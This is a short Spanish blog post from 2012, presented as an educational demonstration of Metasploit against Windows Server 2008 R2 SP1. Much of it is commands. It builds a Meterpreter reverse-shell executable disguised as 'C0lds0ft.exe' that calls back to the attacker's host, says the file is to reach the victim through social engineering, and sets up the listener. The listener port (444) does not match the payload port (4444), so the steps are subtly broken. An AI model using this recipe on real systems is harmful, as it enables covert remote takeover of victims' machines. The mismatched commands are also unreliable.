jueves, 5 de enero de 2012

Metasploit en Windows Server 2008 R2 SP1

En esta demostración con fines educativos se observa un Windows Server 2008 R2 SP1 con IP 192.168.1.39 corriendo sobre un entorno virtualizado del servicio Hyper-V Virtualization y la conexión al equipo atacante mediante Putty (192.168.1.254) donde previamente se construye el archivo .exe, llamado C0lds0ft.exe:
 
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.254
LPORT=4444 X >/root/Escritorio/C0lds0ft.exe

Con este archivo generamos la conexión en reversa desde la víctima, y aquí el ingenio y las técnicas de ingeniería social que se utilice para hacerlo llegar al Target son las que usted tendrá que tener en cuenta para no caer en este tipo de técnicas. Posterior a enviado se procede a poner a la escucha así:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.254
set LPORT 444
exploit


Fuente segu-info